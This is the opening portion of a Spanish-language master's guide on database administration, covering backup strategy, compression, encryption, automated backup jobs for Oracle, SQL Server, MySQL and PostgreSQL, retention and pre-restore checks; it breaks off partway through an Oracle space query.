

Universidad CENFOTEC

Maestría en Bases de Datos con Analítica

Guía de buenas prácticas para la implementación, gestión y seguridad de bases de datos relacionales: enfoque en respaldos, rendimiento y acceso seguro

Marlon Camacho Rodríguez

Fecha: Diciembre, 2024

Contenido

Manejo de respaldos.....	4
Configuración de respaldos.....	4
Identificación de datos críticos.....	4
Planificación de la estrategia de los respaldos.....	5
Consideraciones al crear respaldos de base de datos.....	7
Compresión y cifrado de respaldos.....	8
Construcción de respaldos automáticos.....	11
Almacenamiento de respaldos.....	18
Regla 3-2-1.....	18
Retención y eliminación de respaldos.....	20
Restauración de respaldos.....	21
Consideraciones previas.....	21
Pasos para la Restauración.....	24
Contingencias y manejo de errores.....	25
Monitoreo y notificaciones.....	27
Pruebas de respaldos.....	32
Optimización del rendimiento de bases de datos.....	34
Análisis y ajuste de consultas SQL.....	34
Selección de columnas específicas.....	34
Uso eficiente de índices.....	35
Vistas materializadas.....	36
Particionamiento de tablas.....	37
Tablas temporales.....	38
Actualización de estadísticas y reconstrucción de índices.....	39
Evitar operaciones en columnas indexadas.....	39
Optimización de JOINS.....	40
Sustitución de subconsultas correlacionadas.....	40
Administración eficiente de recursos del sistema.....	41
Asignación de memoria y uso de caché.....	41
Configuración del Paralelismo.....	42
Supervisión y Ajustes Automáticos.....	43
Optimización de la Entrada/Salida (I/O).....	47

Ajustes automáticos	50
Optimización de consultas	51
Ajuste automático de índices	52
Gestión Automática de Memoria	53
Programación de tareas automáticas.....	53
Acceso seguro a bases de datos	56
Control de acceso y autenticación	56
Políticas	56
Restricción de acceso por horario.....	58
Restricción de acceso por IP	60
Autenticación Multifactor (MFA)	61
Políticas de monitoreo y auditoría.....	62
Prevenición de Ataques	63
SQL Injection	63
Malware.....	65
Denegación de Servicio (DoS).....	67
Cifrados y encriptación en bases de datos	69
Cifrado en Tránsito	69
Cifrado en Reposo.....	71

Manejo de respaldos

Los respaldos de bases de datos son fundamentales para la protección de datos en caso de fallos, errores humanos, corrupción de archivos o ataques cibernéticos como el *ransomware*. Sin un sistema de respaldo, la pérdida de datos puede resultar en interrupciones costosas, multas por incumplimiento normativo, y en algunos casos, la pérdida definitiva de información crítica. Al tener respaldos, se pueden recuperar los datos rápidamente y minimizar los tiempos de inactividad.

La siguiente guía trata de mostrar un panorama de posibles situaciones que se pueden dar en una empresa y de cómo se podrían abordar y llevar a una mejor planeación del proceso de respaldos de las bases de datos.

Configuración de respaldos

Inicialmente se definen las secciones correspondientes a la configuración de los respaldos, mencionando secciones como la identificación de datos, estrategia a realizar, almacenamiento, gestión de copias, entre otros.

Luego de dar una introducción a cada sección, se muestra en más detalle cada punto y cómo realizarlo, además de mostrar ejemplos por medio de *scripts* e imágenes.

Identificación de datos críticos

Es crucial identificar qué datos son necesarios respaldar para poder planificar una estrategia. Para esto, se debe enfocar en dos procesos, clasificación de los datos y documentación de componentes.

La clasificación de datos sirve para identificar los datos más críticos y definir la frecuencia de respaldo en función de su importancia y actualización. La documentación de componentes ayuda a mantener un inventario actualizado de las bases de datos y sus componentes esenciales, incluidos los archivos de control y configuración.

Se debe definir claramente qué datos y componentes deben respaldarse, teniendo en cuenta tanto los elementos de la base de datos como los componentes del sistema operativo y las aplicaciones.

Componentes críticos para respaldar

- Sistema operativo: Realizar respaldos iniciales y después de cada actualización importante del sistema operativo del servidor de la base de datos.
- *Software* del *Relational Database Management System* (RDBMS): Respalda el *software* del sistema de gestión de bases de datos después de cada parcheo o actualización.
- Aplicaciones relacionadas: Si es aplicable, incluir en el respaldo aplicaciones como *Oracle E-Business Suite* u *Oracle Application Server*, respaldando tanto versiones completas como incrementales después de cada actualización.
- Contraseñas y configuración de seguridad: Asegurar el respaldo de todas las contraseñas de superusuario y archivos de configuración necesarios para la recuperación.

Planificación de la estrategia de los respaldos

En la planificación de la estrategia se debe definir el o los tipos de respaldos a realizar en la base de datos además de la frecuencia en que deben ser realizados cada uno de los respaldos.

Estrategias de respaldos específicas

Para los respaldos en bases de datos en Oracle se deben tener en cuenta los siguientes puntos:

- Realizar respaldos lógicos. Se puede utilizar herramientas como *Data Pump* para respaldos de exportación lógica, permitiendo la copia de esquemas, tablas o toda la base de datos.
- Realizar respaldos físicos en línea y fuera de línea. Realizar fuera de línea es realizar copias de seguridad en frío, cerrando la base de datos y respaldando archivos de datos, control y configuración. En línea. Se puede utilizar *Recovery Manager* (RMAN) para realizar respaldos mientras la base de datos está en

funcionamiento. Además, se puede configurar respaldos incrementales para reducir el tiempo de recuperación y respaldar los registros de puesta al día archivados.

- Respalda archivos específicos. Respalda archivos de parámetros, control, registros de puesta al día y archivos de red de Oracle.

Para respaldos en bases de datos SQL Server se deben tomar las siguientes configuraciones:

- Respalda bases de datos del sistema: Realizar respaldos completos de bases de datos del sistema como *master*, *model* y *msdb*. No es necesario respaldar *tempdb*, ya que se recrea automáticamente al iniciar el servidor.
- Respalda bases de datos de usuarios: Configurar el modelo de recuperación completa y realizar respaldos completos, diferenciales y de registros de transacciones para bases de datos de usuarios.
- Realizar respaldos lógicos y físicos. Se puede utilizar herramientas como *bcp*, el Asistente de Importación/Exportación o SQL Server *Integration Services* (SSIS) para respaldos lógicos. Para respaldos físicos, se puede considerar particionar las bases de datos muy grandes (*Very Large Database*, VLDB) y distribuir la carga entre múltiples dispositivos de respaldo.

Para respaldos en bases de datos MySQL se deben tomar en cuenta los siguientes puntos:

- Respalos lógicos: Se puede utilizar *mysqldump* para generar copias de seguridad de esquemas, tablas o toda la base de datos.
- Respalos físicos: Se pueden copiar directamente los archivos de datos (*.ibd*, *.frm*, *.MYD*, *.MYI*) y registros binarios para recuperación precisa.
- Respalos incrementales: Se deben habilitar y respaldar los *binlogs* (*mysqlbinlog*) para capturar cambios y minimizar la pérdida de datos.

Para respaldos en bases de datos PostgreSQL se deben tomar en cuenta los siguientes puntos:

- Respalos lógicos: Uso de *pg_dump* y *pg_dumpall* para generar copias de seguridad de estructuras y datos de bases de datos específicas.
- Respalos físicos: Implementación de *pg_basebackup* para realizar copias exactas del sistema de base de datos.
- Respalos diferenciales: Utilización de WAL (*Write-Ahead Logging*) para capturar cambios incrementales y garantizar consistencia de los datos.

Consideraciones al crear respaldos de base de datos

Al realizar un respaldo de bases de datos se debe considerar múltiples aspectos como el tipo de respaldo, ya sea un respaldo completo, diferencial o incremental. Además, se debe contemplar en qué momento realizarlo de tal manera que no represente un alto impacto en el rendimiento del sistema, evaluar si es posible generar respaldos separados, es decir, respaldos diarios de tablas transaccionales o críticas y respaldos semanales de tablas menos críticas como tablas de respaldos, bitácoras, etc.

Los respaldos completos deberían de ser periódicamente, se recomienda realizar este tipo de respaldo una vez por semana en aquellas bases de datos que sean grandes y dinámicas. También se debe considerar el realizarlo previo a cambios estructurales o una actualización de *software* como aplicación de ‘parches’ por ejemplo.

Los respaldos diferenciales, ya que no consumen tanto recurso al almacenar solamente los cambios desde el último respaldo completo, se pueden realizar de manera diaria. Con este tipo de respaldos se puede ahorrar mucho en espacio, recursos y tiempos (inactividad).

Los respaldos incrementales se pueden realizar a las bases de datos muy transaccionales, es decir, con muchos cambios durante el día. Estas son perfectas para realizarles más de un respaldo durante el día y así, en caso de tener que hacer una restauración, se asegura una pérdida de datos mínima. Para asegurar esta mínima pérdida de datos, hay que analizar la transaccionalidad de los datos y así establecer el rango de tiempo en que serán ejecutados

los respaldos. Para este tipo de análisis se pueden tomar en consideración periodos en que hay mayor volumetría como, por ejemplo, épocas del año (navidad, año nuevo, San Valentín, Semana Santa, día de la madre, viernes negro, etc.) y horas con alta transaccionalidad (almuerzo, cena).

Estos son parámetros que se deben tomar en cuenta para decidir en qué momento es oportuno la realización de los respaldos de tal manera que no se vaya a consumir demasiado procesamiento, lo que podría generar retrasos en las operaciones de la base de datos, y tampoco queden ventanas de tiempo muy extensas sin respaldos lo que pueda dificultar la restauración de los datos y pueda incurrir en pérdida de datos.

Compresión y cifrado de respaldos

La compresión de respaldos reduce el tamaño de los archivos de respaldo, lo que ahorra espacio de almacenamiento y permite transferencias de datos más rápidas. La compresión puede reducir significativamente los costos asociados con el almacenamiento, especialmente en entornos de gran volumen de datos. La compresión requiere potencia de procesamiento adicional. Dependiendo del nivel de compresión, puede incrementar el uso de la CPU (*Central Processing Unit*) durante el proceso de respaldo.

En SQL Server la compresión puede habilitarse utilizando la opción *COMPRESSION* en el comando de respaldo:

```
BACKUP DATABASE [NombreBaseDatos]
TO DISK = 'C:\Backups\NombreBaseDatos_Comprimido.bak'
WITH COMPRESSION;
```

La compresión en Oracle se habilita con el parámetro *AS COMPRESSED*
BACKUPSET:

```
RMAN> BACKUP AS COMPRESSED BACKUPSET DATABASE;
```

En MySQL se puede realizar la compresión por medio de *mysqldump* utilizando *gzip*:

```
mysqldump -u root -p nombre_base_datos | gzip > archivo_respaldo.sql.gz
```

En PostgreSQL, se puede aplicar *gzip* directamente sobre la salida de *pg_dump*:

```
pg_dump -U usuario -d base_datos | gzip > respaldo.sql.gz
```

Además, PostgreSQL permite compresión nativa en *pg_basebackup* agregando *-z* para comprimir:

```
pg_basebackup -D /ruta/respaldo -Ft -z -Xfetch -P
```

Asegurar el cifrado de los respaldos, tanto en reposo como en tránsito, para protegerlos contra accesos no autorizados. El cifrado de respaldos implica convertir los datos en un formato que solo puede ser leído o restaurado mediante una clave o certificado. Esto protege los datos contra accesos no autorizados, especialmente en casos de pérdida o robo de medios de almacenamiento.

Al igual que la compresión, el cifrado también consume recursos de CPU, especialmente si se utiliza un cifrado fuerte como *AES-256*. Es esencial gestionar las claves de cifrado de manera segura. Las claves deben ser almacenadas en un lugar seguro y controlado, preferiblemente con acceso restringido a usuarios autorizados.

En SQL Server se puede cifrar un respaldo utilizando un certificado o clave asimétrica:

```
BACKUP DATABASE [NombreBaseDatos]
TO DISK = 'C:\Backups\NombreBaseDatos_Encrypted.bak'
WITH ENCRYPTION (ALGORITHM = AES_256, SERVER CERTIFICATE =
MiCertificado);
```

Para Oracle, se puede habilitar el cifrado con la instrucción *SET ENCRYPTION*:

```
RMAN> SET ENCRYPTION ON IDENTIFIED BY 'MiClave';
RMAN> BACKUP DATABASE;
```

En MySQL, el cifrado de respaldos se puede realizar con *OpenSSL*:

```
mysqldump -u usuario -p --all-databases | gzip | openssl enc -aes-256-cbc -salt -out
respaldo.sql.gz.enc -k contraseña_segura
```

También se puede usar *gpg* para cifrar:

```
mysqldump -u usuario -p --all-databases | gzip | gpg --symmetric --cipher-algo AES256 -o
respaldo.sql.gz.gpg
```

En PostgreSQL, al igual que en MySQL, el cifrado se puede realizar con *OpenSSL*:

```
pg_dump -U usuario -d base_datos | gzip | openssl enc -aes-256-cbc -salt -out
respaldo.sql.gz.enc -k contraseña_segura
```

También se puede utilizar *gpg*:

```
pg_dump -U usuario -d base_datos | gzip | gpg --symmetric --cipher-algo AES256 -o  
respaldo.sql.gz.gpg
```

Consideraciones para tomar en cuenta:

- Evaluar las capacidades del sistema: Antes de habilitar la compresión o el cifrado, se debe revisar la capacidad de procesamiento del servidor y el impacto en el rendimiento. Se puede probar con diferentes configuraciones para encontrar el equilibrio adecuado.
- Aplicar compresión a respaldos de gran tamaño: La compresión es especialmente útil para bases de datos de gran tamaño. Se deben verificar los niveles de compresión soportados por el sistema y seleccionar el que ofrezca una buena relación de compresión y rendimiento.
- Utilizar cifrado para datos sensibles: Siempre que se manejen datos confidenciales, es esencial habilitar el cifrado. Se debe asegurar de que la clave de cifrado esté bien protegida y accesible solo para personal autorizado.
- Combinar compresión y cifrado: La mayoría de los sistemas permiten usar ambas técnicas simultáneamente. Realizar primero la compresión para reducir el tamaño y luego aplicar el cifrado. Esto reduce el tiempo de procesamiento del cifrado, ya que se aplica a un archivo de respaldo más pequeño.
- Automatizar el proceso: Configurar *scripts* y trabajos automáticos que apliquen compresión y cifrado de manera predeterminada en todos los respaldos. Esto garantiza que cada respaldo esté optimizado y protegido, sin depender de la intervención manual.
- Verificar compatibilidad de restauración: Hay que asegurar de que el sistema de restauración pueda manejar respaldos comprimidos y cifrados. Realizar pruebas periódicas de restauración para confirmar que los datos pueden recuperarse correctamente.

Construcción de respaldos automáticos

Por medio de estos *scripts* se pueden realizar los respaldos de una manera segura y óptima, además de crear los pasos para que estos se realicen de una manera automática.

Creación por medio SQL Server:

Creación de clave maestra y un certificado en SQL Server.

```
USE master;
GO
CREATE MASTER KEY ENCRYPTION BY PASSWORD = 'ClaveSeguraParaMasterKey!';
GO
```

Creación del certificado para encriptar los respaldos:

```
USE master;
GO
CREATE CERTIFICATE CertificadoRespaldo
WITH SUBJECT = 'Certificado para respaldo encriptado';
GO
```

Creación del respaldo completo.

```
CREATE PROCEDURE sp_BackupFullEncrypted
    @DatabaseName NVARCHAR(50),
    @BackupPath NVARCHAR(200)
AS
BEGIN
    DECLARE @BackupFileName NVARCHAR(300);
    DECLARE @BackupName NVARCHAR(260);

    SET @BackupFileName = @BackupPath + @DatabaseName + '_Full_Encrypted_' +
        CONVERT(VARCHAR, GETDATE(), 112) + '.bak';

    SET @BackupName = ('Respaldo Completo Encriptado de ' + @DatabaseName);

    BACKUP DATABASE @DatabaseName
    TO DISK = @BackupFileName
    WITH FORMAT, INIT,
        ENCRYPTION(ALGORITHM = AES_256, SERVER CERTIFICATE =
        CertificadoRespaldo),
        NAME = @BackupName,
        STATS = 10;

    PRINT 'Respaldo completo encriptado realizado exitosamente para la base de datos ' +
    @DatabaseName;
END;
```

Creación del respaldo diferencial.

```

CREATE PROCEDURE sp_BackupDiffEncrypted
    @DatabaseName NVARCHAR(50),
    @BackupPath NVARCHAR(200)
AS
BEGIN
    DECLARE @BackupFileName NVARCHAR(300);
    DECLARE @BackupName NVARCHAR(260);

    SET @BackupFileName = @BackupPath + @DatabaseName + '_Diff_Encrypted_' +
        CONVERT(VARCHAR, GETDATE(), 112) + '.bak';

    SET @BackupName = ('Respaldo Diferencial Encriptado de ' + @DatabaseName);

    BACKUP DATABASE @DatabaseName
    TO DISK = @BackupFileName
    WITH DIFFERENTIAL, INIT,
        ENCRYPTION(ALGORITHM = AES_256, SERVER CERTIFICATE =
CertificadoRespaldo),
        NAME = @BackupName,
        STATS = 10;

    PRINT 'Respaldo diferencial encriptado realizado exitosamente para la base de datos ' +
@DatabaseName;
END;

```

Creación del respaldo incremental.

```

CREATE PROCEDURE sp_BackupLogEncrypted
    @DatabaseName NVARCHAR(50),
    @BackupPath NVARCHAR(200)
AS
BEGIN
    DECLARE @BackupFileName NVARCHAR(300);
    DECLARE @BackupName NVARCHAR(260);

    SET @BackupFileName = @BackupPath + @DatabaseName + '_Log_Encrypted_' +
        CONVERT(VARCHAR, GETDATE(), 112) + '.trn';

    SET @BackupName = ('Respaldo de Log Encriptado de ' + @DatabaseName);

    BACKUP LOG @DatabaseName
    TO DISK = @BackupFileName
    WITH INIT,
        ENCRYPTION(ALGORITHM = AES_256, SERVER CERTIFICATE =
CertificadoRespaldo),
        NAME = @BackupName ,
        STATS = 10;

```

```

PRINT 'Respaldo de log encriptado realizado exitosamente para la base de datos ' +
@DatabaseName;
END;

```

Creación de trabajo automático para ejecutar el procedimiento de respaldo completo.

```

EXEC sp_add_job
  @job_name = 'Job_RespaldoCompleto',
  @enabled = 1,
  @description = 'Job para realizar respaldo completo encriptado y comprimido',
  @notify_level_eventlog = 2,
  @notify_level_email = 0,
  @delete_level = 0;

```

Creación del paso para ejecutar el procedimiento de respaldo completo.

```

EXEC sp_add_jobstep
  @job_name = 'Job_RespaldoCompleto',
  @step_name = 'Paso_RespaldoCompleto',
  @subsystem = 'TSQL',
  @command = 'EXEC sp_RespaldoCompleto @DatabaseName =
"NombreDeLaBaseDeDatos", @BackupPath = "C:\Backups\";',
  @on_success_action = 1,
  @retry_attempts = 1,
  @retry_interval = 5;

```

Programación del Job para ejecutarse semanalmente (domingo a las 2:00 AM).

```

EXEC sp_add_jobschedule
  @job_name = 'Job_RespaldoCompleto',
  @name = 'Schedule_Semanal',
  @freq_type = 4,
  @freq_interval = 1,
  @freq_subday_type = 1,
  @freq_subday_interval = 0,
  @active_start_time = 020000;

```

Asociar el Job al SQL Server Agent

```

EXEC sp_add_jobserver
  @job_name = 'Job_RespaldoCompleto';

```

Creación por medio de Oracle:

En Oracle se necesita configurar una clave de encriptación. La configuración se realiza en *RMAN* o directamente en la base de datos.

Desde *RMAN*

```
rman target /
```

Para la configuración de la encriptación de respaldo, se puede utilizar el modo transparente, que usa la clave de encriptación del *wallet* de Oracle.

```
CONFIGURE ENCRYPTION FOR DATABASE ON;  
CONFIGURE ENCRYPTION ALGORITHM 'AES256';
```

También se puede realizar con una contraseña en específico.

```
SET ENCRYPTION ON IDENTIFIED BY 'ClaveSegura' ONLY;
```

Script para respaldo completo con compresión y encriptación. También el *controlfile* y el *spfile*.

```
RUN {  
  ALLOCATE CHANNEL c1 DEVICE TYPE DISK;  
  
  BACKUP AS COMPRESSED BACKUPSET DATABASE  
  TAG 'FULL_BACKUP'  
  FORMAT '/rutaderespaldos/%d_FULL_%T_%U.bkp'  
  ENCRYPTION;  
  
  BACKUP CURRENT CONTROLFILE TAG 'CONTROLFILE_BACKUP';  
  BACKUP SPFILE TAG 'SPFILE_BACKUP';  
  
  RELEASE CHANNEL c1;  
}
```

Script para Respaldo Incremental.

```
RUN {  
  ALLOCATE CHANNEL c1 DEVICE TYPE DISK;  
  
  BACKUP AS COMPRESSED BACKUPSET INCREMENTAL LEVEL 1 DATABASE  
  TAG 'INCREMENTAL_BACKUP'  
  FORMAT '/rutaderespaldos/%d_INCREMENTAL_%T_%U.bkp'  
  ENCRYPTION;  
  
  RELEASE CHANNEL c1;  
}
```

Script para Respaldo de *Archivelog*.

```
RUN {  
  ALLOCATE CHANNEL c1 DEVICE TYPE DISK;
```

```

BACKUP AS COMPRESSED BACKUPSET ARCHIVELOG ALL
TAG 'ARCHIVELOG_BACKUP'
FORMAT '/rutaderespaldos/%d_ARCHIVELOG_%T_%U.bkp'
ENCRYPTION;

DELETE ARCHIVELOG ALL COMPLETED BEFORE 'SYSDATE-1';

RELEASE CHANNEL c1;
}

```

Script para ejecutar respaldos automáticamente. Para esto, se puede utilizar el Oracle Scheduler para crear trabajos programados que llamen a los scripts RMAN.

Job para respaldo completo (Semanal).

```

BEGIN
  DBMS_SCHEDULER.create_job (
    job_name      => 'JOB_BACKUP_FULL',
    job_type      => 'EXECUTABLE',
    job_action    => '/bin/sh',
    number_of_arguments => 1,
    start_date    => SYSTIMESTAMP,
    repeat_interval => 'FREQ=WEEKLY; BYDAY=SUN; BYHOUR=2; BYMINUTE=0;
BYSECOND=0',
    enabled       => TRUE,
    auto_drop     => FALSE,
    comments      => 'Respaldo completo semanal con RMAN'
  );

  DBMS_SCHEDULER.set_job_argument_value(
    job_name      => 'JOB_BACKUP_FULL',
    argument_position => 1,
    argument_value => '/rutadescript/backup_full.rman'
  );

  DBMS_SCHEDULER.set_attribute('JOB_BACKUP_FULL', 'credential_name',
'DBA_CRED');
END;
/

```

Script de job para respaldo incremental (Diario).

```

BEGIN
  DBMS_SCHEDULER.create_job (
    job_name      => 'JOB_BACKUP_INCREMENTAL',
    job_type      => 'EXECUTABLE',
    job_action    => '/bin/sh',

```

```

    number_of_arguments => 1,
    start_date          => SYSTIMESTAMP,
    repeat_interval     => 'FREQ=DAILY; BYHOUR=1; BYMINUTE=0; BYSECOND=0',
    enabled             => TRUE,
    auto_drop          => FALSE,
    comments           => 'Respaldo incremental diario con RMAN'
);
DBMS_SCHEDULER.set_job_argument_value(
    job_name           => 'JOB_BACKUP_INCREMENTAL',
    argument_position  => 1,
    argument_value     => '/rutadescript/backup_incremental.rman'
);

DBMS_SCHEDULER.set_attribute('JOB_BACKUP_INCREMENTAL', 'credential_name',
'DBA_CRED');
END;
/

```

Script de job para respaldo de archivelog (Cada hora).

```

BEGIN
    DBMS_SCHEDULER.create_job (
        job_name           => 'JOB_BACKUP_ARCHIVELOG',
        job_type           => 'EXECUTABLE',
        job_action         => '/bin/sh',
        number_of_arguments => 1,
        start_date         => SYSTIMESTAMP,
        repeat_interval    => 'FREQ=HOURLY; INTERVAL=1',
        enabled            => TRUE,
        auto_drop          => FALSE,
        comments           => 'Respaldo de archivelog cada hora con RMAN'
    );

    DBMS_SCHEDULER.set_job_argument_value(
        job_name           => 'JOB_BACKUP_ARCHIVELOG',
        argument_position  => 1,
        argument_value     => '/rutadescript/backup_archivelog.rman'
    );

    DBMS_SCHEDULER.set_attribute('JOB_BACKUP_ARCHIVELOG', 'credential_name',
'DBA_CRED');
END;
/

```

Creación desde MySQL

Script de respaldo completo automatizado con compresión y cifrado

Para Linux/macOS

```
#!/bin/bash
TIMESTAMP=$(date +"%Y%m%d%H%M%S")
BACKUP_DIR="/backups/mysql"
BACKUP_FILE="$BACKUP_DIR/respaldo_completo_${TIMESTAMP}.sql.gz.enc"
mysqldump -u usuario -p'contraseña' --all-databases | gzip | openssl enc -aes-256-cbc -salt -
out "$BACKUP_FILE" -k contraseña_segura
echo "Respaldo completo de MySQL realizado exitosamente en $BACKUP_FILE"
```

Para Windows (PowerShell):

```
$timestamp = Get-Date -Format "yyyyMMddHHmmss"
$backupDir = "C:\backups\mysql"
$backupFile = "$backupDir\respaldo_completo_${timestamp}.sql.gz.enc"
mysqldump -u usuario -p'contraseña' --all-databases | gzip | openssl enc -aes-256-cbc -salt -
out $backupFile -k contraseña_segura
Write-Output "Respaldo completo de MySQL realizado exitosamente en $backupFile"
```

Script de respaldo Diferencial

Linux/macOS:

```
#!/bin/bash
TIMESTAMP=$(date +"%Y%m%d%H%M%S")
BACKUP_DIR="/backups/mysql"
BACKUP_FILE="$BACKUP_DIR/respaldo_diferencial_${TIMESTAMP}.sql.gz.enc"
mysqldump -u usuario -p'contraseña' --where="fecha_modificacion > NOW() - INTERVAL 1
DAY" basededatos | gzip | openssl enc -aes-256-cbc -salt -out "$BACKUP_FILE" -k
contraseña_segura
echo "Respaldo diferencial de MySQL realizado exitosamente en $BACKUP_FILE"
```

Para Windows

```
$timestamp = Get-Date -Format "yyyyMMddHHmmss"
$backupDir = "C:\backups\mysql"
$backupFile = "$backupDir\respaldo_diferencial_${timestamp}.sql.gz.enc"
mysqldump -u usuario -p'contraseña' --where="fecha_modificacion > NOW() - INTERVAL 1
DAY" basededatos | gzip | openssl enc -aes-256-cbc -salt -out $backupFile -k
contraseña_segura
Write-Output "Respaldo diferencial de MySQL realizado exitosamente en $backupFile"
```

Script para respaldo Incremental

Linux/macOS:

```
#!/bin/bash
TIMESTAMP=$(date +"%Y%m%d%H%M%S")
BACKUP_DIR="/backups/mysql"
BACKUP_FILE="$BACKUP_DIR/respaldo_incremental_${TIMESTAMP}.sql.gz.enc"
```

```
mysqlbinlog --read-from-remote-server --host=servidor --user=usuario --password | gzip |
openssl enc -aes-256-cbc -salt -out "$BACKUP_FILE" -k contraseña_segura
echo "Respaldo incremental de MySQL realizado exitosamente en $BACKUP_FILE"
```

Para Windows

```
$timestamp = Get-Date -Format "yyyyMMddHHmmss"
$backupDir = "C:\backups\mysql"
$backupFile = "$backupDir\respaldo_incremental_$timestamp.sql.gz.enc"
mysqlbinlog --read-from-remote-server --host=servidor --user=usuario --password | gzip |
openssl enc -aes-256-cbc -salt -out $backupFile -k contraseña_segura
Write-Output "Respaldo incremental de MySQL realizado exitosamente en $backupFile"
```

Automatización en Linux/macOS agregando a cron (todos los días a las 2 am)

```
crontab -e
0 2 * * * /ruta/del/script/backup_mysql.sh
```

Almacenamiento de respaldos

Un criterio muy importante es dónde almacenar los respaldos que se realicen. Dependiendo del tipo y frecuencia de los respaldos, esto puede impactar el espacio de almacenamiento donde se decidan mantener. Para esto, es recomendable utilizar la regla 3-2-1, la cual se explicará más adelante, para asegurar un acceso a los respaldos. Además, se deben definir prácticas como compresión de los respaldos y el cifrado.

Algo muy importante es definir el tiempo en que se mantendrán los respaldos, así como el cuándo y cómo se deben eliminar.

Regla 3-2-1

La regla 3-2-1 es una estrategia de respaldo muy recomendada que proporciona un enfoque estructurado para asegurar que los datos estén bien protegidos y disponibles en caso de pérdida o fallo. Este método se basa en mantener múltiples copias de los datos y utilizar diferentes ubicaciones y medios de almacenamiento para garantizar una alta resiliencia.

Dispositivos comunes donde se pueden almacenar los respaldos:

- Almacenamiento en disco: Un respaldo en disco local o externo. Los discos duros ofrecen rapidez en el acceso y son adecuados para restauraciones frecuentes.
- Almacenamiento en cinta: Las cintas magnéticas son utilizadas para respaldos de largo plazo y recuperación ante desastres. Aunque el acceso es más lento, las cintas son altamente duraderas y seguras.
- Almacenamiento en la nube: Servicios en la nube, como *Amazon Simple Storage Service (AWS S3)*, *Azure* o *Google Cloud*, proporcionan opciones escalables y accesibles para respaldos. Otros servicios como *Google Drive*, *Microsoft OneDrive*, *Mega* o *Dropbox* son más accesibles en temas de costos, pero estos solo servirán para almacenar los datos. La nube es especialmente útil para garantizar la disponibilidad en ubicaciones remotas y es ideal para una copia fuera del sitio.

Al diversificar entre dos medios diferentes, se evita la dependencia de un solo tipo de almacenamiento, lo cual reduce el riesgo de pérdida de datos en caso de fallos de *hardware* o problemas específicos del medio.

Ejemplos de almacenamiento fuera del sitio:

- Copia en la nube: Las copias en la nube son populares para respaldos fuera del sitio debido a su accesibilidad desde cualquier ubicación con conexión a internet.
- Centro de datos remoto: Mantener una copia en un centro de datos remoto, incluso en una ciudad o región diferente, proporciona mayor seguridad ante desastres que afectan áreas geográficas específicas.
- Almacenamiento físico remoto: Otra opción es mantener copias en discos o cintas en una ubicación física segura, como una bóveda de seguridad o en instalaciones de almacenamiento dedicadas.

Retención y eliminación de respaldos

Las políticas de retención de respaldos son fundamentales para gestionar eficazmente el almacenamiento y asegurar el cumplimiento con las normativas y necesidades empresariales. La retención adecuada ayuda a balancear la disponibilidad de datos históricos con el uso eficiente del espacio de almacenamiento, minimizando riesgos y costos.

Para la retención basada en requisitos legales y de negocio se definen los tiempos de retención en función de las normativas y acuerdos de nivel de servicio (SLA), que pueden variar entre meses y años.

Se puede realizar una programación de rotación de discos y cintas. Con esto se puede planificar la rotación de medios de almacenamiento, asegurando que se eliminen respaldos antiguos y se mantenga espacio para nuevos respaldos.

Es de ayuda implementar una política de retención que especifique el ciclo de vida de cada respaldo, desde su creación hasta su eliminación segura. Asegurar que los respaldos se eliminen de forma segura, cumpliendo con las políticas de la empresa para proteger la información confidencial.

Implementar un ciclo de vida del respaldo asegura que cada respaldo siga un proceso desde su creación hasta su eliminación. Se pueden seguir los siguientes pasos:

- Realizar el respaldo de acuerdo con el programa de respaldos. Esto incluye seleccionar el tipo de respaldo adecuado (completo, diferencial, incremental) y almacenarlo en el medio designado.
- Retención activa: Los respaldos permanecen accesibles durante el periodo de retención definido. Durante este tiempo, deben estar disponibles para restauración inmediata si es necesario.
- Para respaldos de largo plazo, se puede mover la copia a un almacenamiento de menor costo o a una ubicación de archivo que sea menos costosa pero segura, y que permita el cumplimiento con políticas de retención extendida.

- Al finalizar el periodo de retención, el respaldo debe eliminarse de forma segura para proteger la confidencialidad de los datos. Esto puede implicar el borrado seguro de datos digitales o la destrucción física en el caso de medios físicos como cintas.

Restauración de respaldos

Una guía de buenas prácticas para la restauración de respaldos es esencial porque asegura una recuperación de datos rápida, segura y consistente, minimizando el tiempo de inactividad y el riesgo de pérdida de datos. Al estandarizar procedimientos, reduce errores humanos y facilita el cumplimiento de normativas y auditorías. Además, mejora la preparación ante emergencias, optimiza el uso de recursos y fomenta una cultura de mejora continua, asegurando que el equipo esté listo para restaurar datos de manera eficiente en cualquier situación.

Consideraciones previas

Antes de iniciar con el proceso de restauración se debe de tener en consideración algunos puntos importantes de tal manera que se pueda asegurar realizarla de una manera segura y en caso de ser necesario, revertirla y dejar la base de datos igual al momento antes de iniciar la restauración.

Previo a la restauración se debe asegurar que los respaldos están completos y no están corruptos, lo que es crucial para evitar fallos durante el proceso. Antes de iniciar cualquier restauración se debe verificar. Esto se puede realizar utilizando *RESTORE VERIFYONLY FROM DISK = 'RutaDelRespaldo.bak'*, para SQL Server y *VALIDATE BACKUPSET '/RutaDelRespaldo.bkp'* para Oracle. En MySQL no hay un comando nativo, pero se puede verificar por medio de *xtrabackup* (herramienta de código abierto desarrollado por Percona) *xtrabackup --prepare --target-dir=/ruta/del/respaldo*. Finalmente, en PostgreSQL, se puede verificar el respaldo por medio de *pg_verifybackup /ruta/del/respaldo*. Este comando permite validar que el respaldo está completo y no corrupto.

Luego de verificar el respaldo, es importante confirmar que el servidor tenga los recursos necesarios para soportar la restauración, y que el usuario tenga permisos adecuados. Antes de comenzar, se debe verificar el espacio de almacenamiento, estabilidad

de red y permisos del usuario. El espacio disponible en los discos se puede verificar usando herramientas del sistema operativo o comandos dentro del motor de base de datos para ver el tamaño de la base de datos y el respaldo.

En SQL Server se puede usar los siguientes procedimientos:

```
EXEC sp_spaceused y EXEC xp_fixeddrives;
```

El *sp_spaceused* proporciona información sobre el uso de espacio en la base de datos o tablas específicas, incluyendo tamaño total, espacio reservado, utilizado y libre. Algo a considerar con este procedimiento es que su precisión depende de la actualización de estadísticas en las tablas. Es recomendable ejecutar *DBCC UPDATEUSAGE* para obtener datos actualizados si se sospecha que hay inconsistencias.

El *xp_fixeddrives* muestra el espacio libre en *megabytes* en las unidades de disco accesibles desde el servidor SQL Server, permitiendo evaluar la capacidad de almacenamiento y planificar recursos eficientemente.

En Oracle, no existen estos procedimientos almacenados, sin embargo, se pueden realizar consultas SQL para obtener la información. Se debe considerar que se tengan los permisos adecuados.

Este *script* utiliza las vistas *DBA_DATA_FILES* y *DBA_FREE_SPACE*, que están disponibles para usuarios con privilegios de DBA. Proporciona información completa sobre todos los *tablespaces* de la base de datos.

```
SELECT a.tablespace_name,
       a.size_mb,
